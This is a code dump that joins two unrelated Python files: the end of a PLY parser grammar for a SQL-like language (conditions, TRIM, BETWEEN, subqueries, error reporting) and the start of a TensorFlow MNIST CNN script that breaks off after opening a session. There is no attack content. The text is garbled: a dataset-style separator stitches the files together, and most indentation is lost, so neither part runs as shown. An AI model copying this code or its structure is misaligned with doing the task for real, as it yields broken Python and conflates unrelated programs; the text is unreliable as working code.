    ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_CondicionM(t):
'CONDICION : MENOS CONDICION %prec UMENOS'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"-\" <CONDICION>")
ret = Retorno(ExpresionUnaria(t[2].getInstruccion(), OPERACIONES.MENOS), NodoAST('-'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_CondicionP(t):
'CONDICION : MAS CONDICION %prec UMAS'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"+\" <CONDICION>")
ret = Retorno(ExpresionUnaria(t[2].getInstruccion(), OPERACIONES.MAS), NodoAST('+'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_CondicionExtract(t):
'CONDICION : EXTRACT PABRE DATETIME FROM PTIMESTAMP PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"EXTRACT\" \"(\" <DATETIME> \"FROM\" <PTIMESTAMP> \")\"")
ret = Retorno(Extract(t[5].getInstruccion(), t[3]), NodoAST('EXTRACT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_CondicionFuncionWhere(t):
'CONDICION : FUNCIONES_WHERE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCIONES_WHERE>")
t[0] = t[1]
def p_CondicionNum(t):
'CONDICION : NUMERO '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NUMERO\"")
ret = Retorno(Numero(t[1]),NodoAST(str(t[1])))
t[0] = ret
def p_CondicionDec(t):
'CONDICION : DECIMALN'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"DECIMALN\"")
ret = Retorno(Decimal(t[1]),NodoAST(str(t[1])))
t[0] = ret
def p_CondicionCad(t):
'CONDICION : CADENA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"CADENA\"")
ret = Retorno(Cadena(t[1]),NodoAST(t[1]))
t[0] = ret
def p_CondicionTrue(t):
'CONDICION : TRUE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"TRUE\"")
ret = Retorno(Booleano(t[1]),NodoAST(t[1]))
t[0] = ret
def p_CondicionFalse(t):
'CONDICION : FALSE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"FALSE\"")
ret = Retorno(Booleano(t[1]),NodoAST(t[1]))
t[0] = ret
def p_CondicionId(t):
'CONDICION : ID '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"ID\"")
ret = Retorno(Id(t[1],None),NodoAST(t[1]))
t[0] = ret
def p_CondicionIdP(t):
'CONDICION : ID PUNTO ID '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"ID\" \".\" \"ID\"")
val = Id(t[3], t[1])
ret = Retorno(val, NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionIdPor(t):
'CONDICION : ID PUNTO POR '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"ID\" \".\" \"*\"")
val = Id('*', t[1])
ret = Retorno(val, NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionFuncionSistema(t):
'CONDICION : FUNCIONES_SISTEMA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCIONES_SISTEMA>")
t[0] = t[1]
def p_CondicionDatePart(t):
'CONDICION : DATE_PART PABRE CADENA COMA INTERVAL CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"DATE_PART\" \"(\" \"CADENA\" \",\" \"INTERVAL\" \"CADENA\" \")\"")
ret = Retorno(DatePart(t[3], t[6]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('DATE_PART'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[6]))
t[0] = ret
def p_CondicionCurrentDate(t):
'CONDICION : CURRENT_DATE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"CURRENT_DATE\"")
ret = Retorno(CurrentDate(), NodoAST('CURRENT_DATE'))
t[0] = ret
def p_CondicionCurrentTime(t):
'CONDICION : CURRENT_TIME '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"CURRENT_TIME\"")
ret = Retorno(CurrentTime(), NodoAST('CURRENT_TIME'))
t[0] = ret
def p_CondicionTimeStamp(t):
'CONDICION : TIMESTAMP CADENA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"TIMESTAMP\" \"CADENA\"")
ret = Retorno(Timestamp(t[2]), NodoAST('TIMESTAMP'))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_CondicionBetween(t):
'CONDICION : CONDICION BETWEEN CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"BETWEEN\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[3].getInstruccion(), OPERACION_LOGICA.BETWEEN), NodoAST('BETWEEN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionNotBetween(t):
'CONDICION : CONDICION NOT BETWEEN CONDICION %prec NOTB'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"NOT\" \"BETWEEN\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[4].getInstruccion(), OPERACION_LOGICA.NOTBETWEEN), NodoAST('NOT BETWEEN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_CondicionBetweenSimetric(t):
'CONDICION : CONDICION BETWEEN SIMMETRIC CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"BETWEEN\" \"SIMMETRIC\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[4].getInstruccion(), OPERACION_LOGICA.BETWEENSIMMETRIC), NodoAST('BETWEEN SIMMETRIC'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_CondicionBetweenNotSimetric(t):
'CONDICION : CONDICION NOT BETWEEN SIMMETRIC CONDICION %prec NOTB'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"NOT\" \"BETWEEN\" \"SIMMETRIC\" <CONDICION>")
    ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[5].getInstruccion(), OPERACION_LOGICA.NOTBETWEENSIMMETRIC), NodoAST('NOT BETWEEN SIMMETRIC'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_CondicionIsDistinct(t):
'CONDICION : CONDICION IS DISTINCT FROM CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" \"DISTINCT\" \"FROM\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[5].getInstruccion(), OPERACION_LOGICA.ISDISTINCT), NodoAST('IS DISTINCT'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_CondicionIsNotDistinct(t):
'CONDICION : CONDICION IS NOT DISTINCT FROM CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" \"NOT\" \"DISTINCT\" \"FROM\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[6].getInstruccion(), OPERACION_LOGICA.ISNOTDISTINCT), NodoAST('IS NOT DISTINCT'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[6].getNodo())
t[0] = ret
def p_CondicionNull(t):
'CONDICION : NULL '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NULL\"")
ret = Retorno(Null(), NodoAST('NULL'))
t[0] = ret
def p_CondicionUnknown(t):
'CONDICION : UNKNOWN '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"UNKNOWN\"")
ret = Retorno(Unknow(), NodoAST('UNKNOW'))
t[0] = ret
def p_CondicionSubConsulta(t):
'CONDICION : PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"(\" <SUBCONSULTA> \")\"")
t[0] = t[2]
def p_CondicionFunciones(t):
'CONDICION : FUNCION PABRE ID PCIERRA'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCION> \"(\" \"ID\" \")\"")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion(t[1], val_id, None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionFunciones1(t):
'CONDICION : FUNCION PABRE ID PUNTO ID PCIERRA'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCION> \"(\" \"ID\" \".\" \"ID\" \")\"")
val_id = Id(t[5], t[3])
ret = Retorno(FuncionAgregacion(t[1], val_id, None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
    ret.getNodo().setHijo(NodoAST(t[3]))
    ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_CondicionNow(t):
'CONDICION : NOW PABRE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NOW\" \"(\" \")\"")
ret = Retorno(Now(), NodoAST('NOW'))
t[0] = ret
def p_FuncionesSistemaAlias(t):
'FUNCIONES_SISTEMA : ID_FUNCION PABRE LCONDICION_FUNCION PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION> \"(\" <LCONDICION_FUNCION> \")\" <ALIAS>")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesSistema(t):
'FUNCIONES_SISTEMA : ID_FUNCION PABRE LCONDICION_FUNCION PCIERRA '
global reporte_gramatical
    reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION> \"(\" <LCONDICION_FUNCION> \")\"")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_FuncionesSistemaString(t):
'FUNCIONES_SISTEMA : ID_FUNCION_S PABRE LCONDICION_FUNCION_S PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION_S> \"(\" <LCONDICION_FUNCION_S> \")\" <ALIAS>")
ret = Retorno(FuncionesSistema(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
    ret.getNodo().setHijo(t[3].getNodo())
    ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesSistemaString1(t):
'FUNCIONES_SISTEMA : ID_FUNCION_S PABRE LCONDICION_FUNCION_S PCIERRA '
global reporte_gramatical
    reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION_S> \"(\" <LCONDICION_FUNCION_S> \")\"")
ret = Retorno(FuncionesSistema(t[1], t[3].getInstruccion(), None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_FuncionesSistemaTrimA(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH CADENA FROM CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= \"TRIM\" \"(\" <LBOTH> \"CADENA\" \"FROM\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(FuncionTrim(t[3], t[4], t[6], t[8].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[4]))
ret.getNodo().setHijo(NodoAST(t[6]))
ret.getNodo().setHijo(t[8].getNodo())
t[0] = ret
def p_FuncionesSistemaTrim(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH CADENA FROM CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= \"TRIM\" \"(\" <LBOTH> \"CADENA\" \"FROM\" \"CADENA\" \")\"")
ret = Retorno(FuncionTrim(t[3], t[4], t[6], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[4]))
ret.getNodo().setHijo(NodoAST(t[6]))
t[0] = ret
def p_FuncionesSistemaTrimA1(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH FROM CADENA COMA CADENA PCIERRA ALIAS '
global reporte_gramatical
    reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= \"TRIM\" \"(\" <LBOTH> \"FROM\" \"CADENA\" \",\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(FuncionTrim(t[3], t[5], t[7], t[9].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_FuncionesSistemaTrim1(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH FROM CADENA COMA CADENA PCIERRA '
global reporte_gramatical
    reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= \"TRIM\" \"(\" <LBOTH> \"FROM\" \"CADENA\" \",\" \"CADENA\" \")\"")
ret = Retorno(FuncionTrim(t[3], t[5], t[7], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
t[0] = ret
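# Illustrative TRIM calls matched by the four rules above (assumed examples):
# TRIM(BOTH 'x' FROM 'xxhellox') AS limpio  and  TRIM(LEADING FROM 'hello', 'h').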
def p_Id_FuncionSubstring(t):
'ID_FUNCION_S : SUBSTRING '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION_S> ::= \"SUBSTRING\"")
t[0] = 'SUBSTRING'
def p_Id_FuncionLength(t):
'ID_FUNCION_S : LENGTH '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION_S> ::= \"LENGTH\"")
t[0] = 'LENGTH'
def p_Id_FuncionSubstr(t):
'ID_FUNCION_S : SUBSTR '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION_S> ::= \"SUBSTR\"")
t[0] = 'SUBSTR'
def p_LBOTHLeading(t):
'LBOTH : LEADING '
global reporte_gramatical
reporte_gramatical.append("<LBOTH> ::= \"LEADING\"")
t[0] = 'LEADING'
def p_LBOTHTrailing(t):
'LBOTH : TRAILING '
global reporte_gramatical
reporte_gramatical.append("<LBOTH> ::= \"TRAILING\"")
t[0] = 'TRAILING'
def p_LBOTHBoth(t):
'LBOTH : BOTH '
global reporte_gramatical
reporte_gramatical.append("<LBOTH> ::= \"BOTH\"")
t[0] = 'BOTH'
def p_LCondicionFuncion_Condicion(t):
'LCONDICION_FUNCION_S : CONDICION '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION_S> ::= <CONDICION>")
t[0] = t[1]
def p_LCondicionFuncion_S(t):
'LCONDICION_FUNCION_S : CONDICION COMA NUMERO COMA NUMERO '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION_S> ::= <CONDICION> \",\" \"NUMERO\" \",\" \"NUMERO\"")
val = [t[1].getInstruccion(), Numero(t[3]), Numero(t[5])]
ret = Retorno(val, NodoAST('PARAMETROS'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(str(t[3])))
ret.getNodo().setHijo(NodoAST(str(t[5])))
t[0] = ret
def p_IdFuncionAbs(t):
'ID_FUNCION : ABS '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"ABS\"")
t[0] = 'ABS'
def p_IdFuncionCBRT(t):
'ID_FUNCION : CBRT '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"CBRT\"")
t[0] = 'CBRT'
def p_IdFuncionCeil(t):
'ID_FUNCION : CEIL '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"CEIL\"")
t[0] = 'CEIL'
def p_IdFuncionCeiling(t):
'ID_FUNCION : CEILING '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"CEILING\"")
t[0] = 'CEILING'
def p_LCondicionFuncion1(t):
'LCONDICION_FUNCION : CONDICION '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION> ::= <CONDICION>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_LCondicionFuncion(t):
'LCONDICION_FUNCION : LCONDICION_FUNCION COMA CONDICION '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION> ::= <LCONDICION_FUNCION> \",\" <CONDICION>")
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_DateTimeYear(t):
'DATETIME : YEAR '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"YEAR\"")
t[0] = 'YEAR'
def p_DateTimeHour(t):
'DATETIME : HOUR '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"HOUR\"")
t[0] = 'HOUR'
def p_DateTimeMinute(t):
'DATETIME : MINUTE '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"MINUTE\"")
t[0] = 'MINUTE'
def p_DateTimeSecond(t):
'DATETIME : SECOND '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"SECOND\"")
t[0] = 'SECOND'
def p_DateTimeMonth(t):
'DATETIME : MONTH '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"MONTH\"")
t[0] = 'MONTH'
def p_DateTimeDay(t):
'DATETIME : DAY '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"DAY\"")
t[0] = 'DAY'
def p_FuncionesWhereExist(t):
'FUNCIONES_WHERE : EXISTS PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= \"EXISTS\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Exists(t[3].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('EXISTS'))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_FuncionesWhereIn(t):
'FUNCIONES_WHERE : CONDICION IN PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"IN\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(In(t[1].getInstruccion(), t[4].getInstruccion(), True), NodoAST('IN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_FuncionesWhereNotIn(t):
'FUNCIONES_WHERE : CONDICION NOT IN PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"NOT\" \"IN\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(In(t[1].getInstruccion(), t[5].getInstruccion(), False), NodoAST('NOT IN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereAny(t):
'FUNCIONES_WHERE : CONDICION OPERATOR_FW ANY PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> <OPERATOR_FW> \"ANY\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Any_op(t[1].getInstruccion(), t[2], 'ANY', t[5].getInstruccion()), NodoAST(t[2]))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST('ANY'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereAll(t):
'FUNCIONES_WHERE : CONDICION OPERATOR_FW ALL PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> <OPERATOR_FW> \"ALL\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Any_op(t[1].getInstruccion(), t[2], 'ALL', t[5].getInstruccion()), NodoAST(t[2]))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST('ALL'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereSome(t):
'FUNCIONES_WHERE : CONDICION OPERATOR_FW SOME PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> <OPERATOR_FW> \"SOME\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Any_op(t[1].getInstruccion(), t[2], 'SOME', t[5].getInstruccion()), NodoAST(t[2]))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST('SOME'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
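# ANY / ALL / SOME comparisons share the Any_op node; an illustrative WHERE
# clause for these rules (assumed example):
#   WHERE precio > ALL (SELECT precio FROM productos)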
def p_FuncionesWhereLike(t):
'FUNCIONES_WHERE : CONDICION LIKE CADENA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"LIKE\" \"CADENA\"")
ret = Retorno(Like(t[1].getInstruccion(), t[3], True), NodoAST('LIKE'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_FuncionesWhereNotLike(t):
'FUNCIONES_WHERE : CONDICION NOT LIKE CADENA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"NOT\" \"LIKE\" \"CADENA\"")
    ret = Retorno(Like(t[1].getInstruccion(), t[4], False), NodoAST('NOT LIKE'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(t[4]))
t[0] = ret
def p_OperatorFwMenor(t):
'OPERATOR_FW : MENOR '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwMayor(t):
'OPERATOR_FW : MAYOR '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwMenorIgual(t):
'OPERATOR_FW : MENORIGUAL '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwMayorIgual(t):
'OPERATOR_FW : MAYORIGUAL '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwIgual(t):
'OPERATOR_FW : IGUAL '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwDif(t):
'OPERATOR_FW : DIF '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwDif1(t):
'OPERATOR_FW : DIF1 '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_PTimestamC(t):
'PTIMESTAMP : TIMESTAMP CADENA '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"TIMESTAMP\" \"CADENA\"")
ret = Retorno(Cadena(t[2]), NodoAST(t[2]))
t[0] = ret
def p_PTimestamId(t):
'PTIMESTAMP : TIMESTAMP ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"TIMESTAMP\" \"ID\"")
ret = Retorno(Id(t[2], None), NodoAST(t[2]))
t[0] = ret
def p_PTimestamIdPId(t):
'PTIMESTAMP : TIMESTAMP ID PUNTO ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"TIMESTAMP\" \"ID\" \".\" \"ID\"")
ret = Retorno(Id(t[4], t[2]), NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[2]))
    ret.getNodo().setHijo(NodoAST(t[4]))
    t[0] = ret
def p_PTimestamCadena(t):
'PTIMESTAMP : CADENA '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"CADENA\"")
ret = Retorno(Cadena(t[1]), NodoAST(t[1]))
t[0] = ret
def p_PTimestamId1(t):
'PTIMESTAMP : ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"ID\"")
ret = Retorno(Id(t[1], None), NodoAST(t[1]))
t[0] = ret
def p_PTimestamIdP(t):
'PTIMESTAMP : ID PUNTO ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"ID\" \".\" \"ID\"")
ret = Retorno(Id(t[3], t[1]), NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[1]))
    ret.getNodo().setHijo(NodoAST(t[3]))
    t[0] = ret
def p_empty(t):
'EMPTY :'
def p_error(t):
    global counter_syntactic_error
    if not t:
        # End of input reached with no token to report.
        return
    err = open("reports/error_syntactic.txt", "a+")
    txt = '<tr><td>' + str(counter_syntactic_error) + '</td>'
    txt += '<td>' + str(t.value) + '</td>'
    txt += '<td>' + 'Texto ingresado no reconocido.' + '</td>'
    txt += '<td>' + str(t.lexer.lineno) + '</td>'
    txt += '<td>' + str(get_column(t.lexer.lexdata, t)) + '</td></tr>\n'
    err.write(txt)
    err.close()
    counter_syntactic_error += 1
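    # Panic-mode recovery: discard tokens until a closing brace is found, then restart the parser.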
while True:
entry = parser.token()
if not entry or entry.type == 'RBRACE':
break
parser.restart()
# START PARSING THE INPUT TEXT
parser = yacc.yacc()
def parse(p_input):
global counter_lexical_error, counter_syntactic_error
counter_lexical_error = 1
counter_syntactic_error = 1
return parser.parse(p_input)
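# Minimal usage sketch (an addition, not part of the original grammar): it assumes the module
# is run directly and that parse() returns whatever structure the productions above build.
# The sample SQL text below is illustrative only and may not match the full grammar.
if __name__ == "__main__":
    ejemplo = "SELECT * FROM clientes WHERE edad > 18;"
    print(parse(ejemplo))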
|
py | 1a4baa080c227c90f7a54f4fd8ce69901954e1eb | import numpy as np
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
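# Helper builders for the CNN: truncated-normal weights, constant biases,
# 'SAME'-padded 2D convolution, 2x2 max-pooling, and conv/fully-connected layer constructors.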
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def conv_layer(input, shape):
W = weight_variable(shape)
b = bias_variable([shape[3]])
return tf.nn.relu(conv2d(input, W) + b)
def full_layer(input, size):
in_size = int(input.get_shape()[1])
W = weight_variable([in_size, size])
b = bias_variable([size])
return tf.matmul(input, W) + b
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
x_image = tf.reshape(x, [-1, 28, 28, 1])
conv1 = conv_layer(x_image, shape=[5, 5, 1, 32])
conv1_pool = max_pool_2x2(conv1)
conv2 = conv_layer(conv1_pool, shape=[5, 5, 32, 64])
conv2_pool = max_pool_2x2(conv2)
conv2_flat = tf.reshape(conv2_pool, [-1, 7*7*64])
full_1 = tf.nn.relu(full_layer(conv2_flat, 1024))
keep_prob = tf.placeholder(tf.float32)
full1_drop = tf.nn.dropout(full_1, keep_prob=keep_prob)
y_conv = full_layer(full1_drop, 10)
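# Graph summary: 28x28 input -> 5x5 conv (32 maps) -> 2x2 pool -> 5x5 conv (64 maps) -> 2x2 pool
# -> fully connected 1024 with dropout -> 10 output logits.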
DATA_DIR = '../data/MNIST_DATA'
NUM_STEPS = 1000
MINIBATCH_SIZE = 50
mnist = input_data.read_data_sets(DATA_DIR, one_hot=True)
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv, labels=y_))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
